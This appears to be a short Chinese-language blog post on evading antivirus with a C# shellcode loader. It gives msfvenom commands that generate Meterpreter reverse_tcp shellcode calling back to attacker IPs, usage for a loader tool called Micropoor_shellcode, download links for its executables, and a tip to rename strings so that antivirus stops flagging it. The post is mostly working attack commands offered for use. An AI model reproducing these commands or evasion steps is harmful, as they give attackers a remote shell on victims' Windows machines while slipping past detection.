2018年12月3日星期一

通过C#.NET编程绕过杀软

kali msfcenom 生成C#shellcode

root@kali:~#  msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.145 -f csharp > payload.txt


Micropoor_shellcode for payload backdoor


Micropoor_shellcode:

Usage:

Micropoor_shellcode  port host

E.g

Micropoor_shellcode.exe 4444 192.168.1.5

Generate payload:

msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

copy shellcode to Micropoor_box.rb








Micropoor_shellcode_x64.exe:
大小: 136192 字节
修改时间: 2019122, 4:40:59
MD5: 304F3C23AD6C57714EDB73D93DA6813D
SHA1: 63B213272AADA91A44F965741E3720EE25CAF7C9
CRC32: 4C2FDE0A
https://drive.google.com/open?id=14HapmSXQtb-HpnXeO3MUEf2utwKfkhOa

Micropoor_shellcode_x86.exe:
大小: 117248 字节
修改时间: 2019122, 2:45:50
MD5: D91444F0A632DEE7F57BAE432CEFFAEC
SHA1: 3D5135FE30FBEFD090B6BBB1F7738DB25B0C2CCC
CRC32: 02BE2833
https://drive.google.com/open?id=15GqGl5KgfVpEkCBItrmqddpDxmXzFG6m

Micropoor_shellcode.rb
大小: 956 字节
修改时间: 2019122, 3:13:17
MD5: 9A82AB2C3A39CABC26FC68864DB07BA1
SHA1: 92D6253C88BA10073CD3AAEE8C38C366DFC7761F
CRC32: 97FA3861
https://drive.google.com/open?id=17uv2Mszu4et3Co1HWQ50mMZiPCL7Ku9F

目前搜集问题总结:

问题1:程序崩溃:
           shellcode分离加载器分为x86,x64,版本。请对应相关的Micropoor_shellcode.exe。
这里需注意,msfvenom的payload其中windows/messagebox,是分x64与x86的,只是msfvenom本身仅提供了x86版本的shellcode。所以如果需运行messagebox,需要调用Micropoor_shellcode_x86.exe。
           程序崩溃2:
           如果生成x86或者x64的shellcode,那么msf本身请对应相关位数的payload。

问题2:被查杀:
           了解用法后,请去掉Micropoor的字符串字样,或者更改其他字符串即可。
         

没有评论:

发表评论

学习资源

https://start.me/p/PwlKgn/apt